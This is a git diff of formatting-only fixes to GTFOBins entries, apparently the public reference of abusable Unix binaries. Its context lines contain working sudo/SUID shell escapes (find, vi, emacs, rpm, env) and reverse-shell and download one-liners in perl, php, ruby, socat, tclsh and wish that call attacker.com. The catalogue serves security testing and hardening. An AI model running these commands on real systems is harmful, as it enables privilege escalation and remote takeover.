diff --git a/_gtfobins/ash.md b/_gtfobins/ash.md
index 0e3937b..cfff65a 100644
--- a/_gtfobins/ash.md
+++ b/_gtfobins/ash.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo ash
 suid-enabled:
 - code: ./ash
----
\ No newline at end of file
+---
diff --git a/_gtfobins/csh.md b/_gtfobins/csh.md
index d4ea657..e5890be 100644
--- a/_gtfobins/csh.md
+++ b/_gtfobins/csh.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo csh
 suid-enabled:
 - code: ./csh -b
----
\ No newline at end of file
+---
diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md
index 70f52f8..8a1ce0d 100644
--- a/_gtfobins/curl.md
+++ b/_gtfobins/curl.md
@@ -12,4 +12,4 @@ functions:
 URL=http://attacker.com/file_to_get
 LFILE=where_to_save
 curl $URL -o $LFILE
----
\ No newline at end of file
+---
diff --git a/_gtfobins/emacs.md b/_gtfobins/emacs.md
index 5f7a9db..2655229 100644
--- a/_gtfobins/emacs.md
+++ b/_gtfobins/emacs.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo emacs -Q -nw --eval '(term "/bin/sh")'
 suid-enabled:
 - code: ./emacs -Q -nw --eval '(term "/bin/sh -p")'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/env.md b/_gtfobins/env.md
index b47eac4..b3e014f 100644
--- a/_gtfobins/env.md
+++ b/_gtfobins/env.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo env /bin/sh
 suid-enabled:
 - code: ./env /bin/sh -p
----
\ No newline at end of file
+---
diff --git a/_gtfobins/expect.md b/_gtfobins/expect.md
index f489f86..9cd0f3d 100644
--- a/_gtfobins/expect.md
+++ b/_gtfobins/expect.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo expect -c 'spawn /bin/sh;interact'
 suid-enabled:
 - code: ./expect -c 'spawn /bin/sh -p;interact'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/find.md b/_gtfobins/find.md
index be88dbf..433fadb 100644
--- a/_gtfobins/find.md
+++ b/_gtfobins/find.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo find . -exec /bin/sh \; -quit
 suid-enabled:
 - code: ./find . -exec /bin/sh -p \; -quit
----
\ No newline at end of file
+---
diff --git a/_gtfobins/ftp.md b/_gtfobins/ftp.md
index 6ef6c88..35e642e 100644
--- a/_gtfobins/ftp.md
+++ b/_gtfobins/ftp.md
@@ -20,4 +20,4 @@ functions:
 RHOST=attacker.com
 ftp $RHOST
 get file_to_get
----
\ No newline at end of file
+---
diff --git a/_gtfobins/ionice.md b/_gtfobins/ionice.md
index a5f578e..bb95116 100644
--- a/_gtfobins/ionice.md
+++ b/_gtfobins/ionice.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo ionice /bin/sh
 suid-enabled:
 - code: ./ionice /bin/sh -p
----
\ No newline at end of file
+---
diff --git a/_gtfobins/perl.md b/_gtfobins/perl.md
index cfcaa36..d26420b 100644
--- a/_gtfobins/perl.md
+++ b/_gtfobins/perl.md
@@ -12,4 +12,4 @@ functions:
 export RHOST=attacker.com
 export RPORT=12345
 perl -e 'use Socket;$i="$ENV{RHOST}";$p=$ENV{RPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/php.md b/_gtfobins/php.md
index 9699e68..7944ba5 100644
--- a/_gtfobins/php.md
+++ b/_gtfobins/php.md
@@ -35,6 +35,6 @@ functions:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
 code: |
 export RHOST=attacker.com
- export RPORT=12345
+ export RPORT=12345
 php -r '$sock=fsockopen($_ENV["RHOST"],$_ENV["RPORT"]);exec("/bin/sh -i <&3 >&3 2>&3");'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/rpm.md b/_gtfobins/rpm.md
index c4cb4ab..d52e84c 100644
--- a/_gtfobins/rpm.md
+++ b/_gtfobins/rpm.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
 suid-enabled:
 - code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/rpmquery.md b/_gtfobins/rpmquery.md
index de73d72..5654fc5 100644
--- a/_gtfobins/rpmquery.md
+++ b/_gtfobins/rpmquery.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
 suid-enabled:
 - code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/ruby.md b/_gtfobins/ruby.md
index ff7cb48..66b3cea 100644
--- a/_gtfobins/ruby.md
+++ b/_gtfobins/ruby.md
@@ -17,4 +17,4 @@ functions:
 ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
 load-library:
 - code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/socat.md b/_gtfobins/socat.md
index 437e83d..5418a54 100644
--- a/_gtfobins/socat.md
+++ b/_gtfobins/socat.md
@@ -4,11 +4,11 @@ functions:
 - description: Run socat file:`tty`,raw,echo=0 tcp-listen:12345 on the attacker box to receive the shell.
 code: |
 RHOST=attacker.com
- RPORT=12345
+ RPORT=12345
 socat tcp-connect:$RHOST:$RPORT exec:"bash -li",pty,stderr,setsid,sigint,sane
 bind-shell:
 - description: Run socat FILE:`tty`,raw,echo=0 TCP:target.com:12345 on the attacker box to connect to the shell.
 code: |
 LPORT=12345
 socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:bash,pty,stderr,setsid,sigint,sane
----
\ No newline at end of file
+---
diff --git a/_gtfobins/strace.md b/_gtfobins/strace.md
index 7479a82..1a23aa0 100644
--- a/_gtfobins/strace.md
+++ b/_gtfobins/strace.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo strace -o /dev/null /bin/sh
 suid-enabled:
 - code: ./strace -o /dev/null /bin/sh -p
----
\ No newline at end of file
+---
diff --git a/_gtfobins/taskset.md b/_gtfobins/taskset.md
index 813d4a2..9042146 100644
--- a/_gtfobins/taskset.md
+++ b/_gtfobins/taskset.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo taskset 1 /bin/sh
 suid-enabled:
 - code: ./taskset 1 /bin/sh -p
----
\ No newline at end of file
+---
diff --git a/_gtfobins/tclsh.md b/_gtfobins/tclsh.md
index 6505349..c7ae1f4 100644
--- a/_gtfobins/tclsh.md
+++ b/_gtfobins/tclsh.md
@@ -14,8 +14,8 @@ functions:
 exec /bin/sh -p <@stdin >@stdout 2>@stderr
 reverse-shell-non-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
+ code: |
 export RHOST=attacker.com
- export RPORT=12345
+ export RPORT=12345
 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
----
\ No newline at end of file
+---
diff --git a/_gtfobins/telnet.md b/_gtfobins/telnet.md
index 8941650..f45e28a 100644
--- a/_gtfobins/telnet.md
+++ b/_gtfobins/telnet.md
@@ -32,5 +32,5 @@ functions:
 ./telnet $RHOST $RPORT
 ^]
 !/bin/sh
-
+
 ---
diff --git a/_gtfobins/tftp.md b/_gtfobins/tftp.md
index a57adab..f391860 100644
--- a/_gtfobins/tftp.md
+++ b/_gtfobins/tftp.md
@@ -12,4 +12,4 @@ functions:
 RHOST=attacker.com
 tftp $RHOST
 get file_to_get
----
\ No newline at end of file
+---
diff --git a/_gtfobins/vi.md b/_gtfobins/vi.md
index 5baf153..1c67ae5 100644
--- a/_gtfobins/vi.md
+++ b/_gtfobins/vi.md
@@ -10,4 +10,4 @@ functions:
 - code: sudo vi -c ':!/bin/sh'
 suid-enabled:
 - code: ./vi -c ':!/bin/sh -p'
----
\ No newline at end of file
+---
diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md
index 900f98a..f8dffb8 100644
--- a/_gtfobins/wget.md
+++ b/_gtfobins/wget.md
@@ -12,4 +12,4 @@ functions:
 export URL=http://attacker.com/file_to_get
 export LFILE=where_to_save
 wget $URL -O $LFILE
----
\ No newline at end of file
+---
diff --git a/_gtfobins/wish.md b/_gtfobins/wish.md
index 12aedc0..230c0e9 100644
--- a/_gtfobins/wish.md
+++ b/_gtfobins/wish.md
@@ -10,8 +10,8 @@ functions:
 exec /bin/sh <@stdin >@stdout 2>@stderr
 reverse-shell-non-interactive:
 - description: Run `nc -l -p 12345` on the attacker box to receive the shell.
- code: |
+ code: |
 export RHOST=attacker.com
- export RPORT=12345
+ export RPORT=12345
 echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | wish
----
\ No newline at end of file
+---
diff --git a/_gtfobins/zsh.md b/_gtfobins/zsh.md
index acd3330..15cc1b3 100644
--- a/_gtfobins/zsh.md
+++ b/_gtfobins/zsh.md
@@ -6,4 +6,4 @@ functions:
 - code: sudo zsh
 suid-enabled:
 - code: ./zsh
----
\ No newline at end of file
+---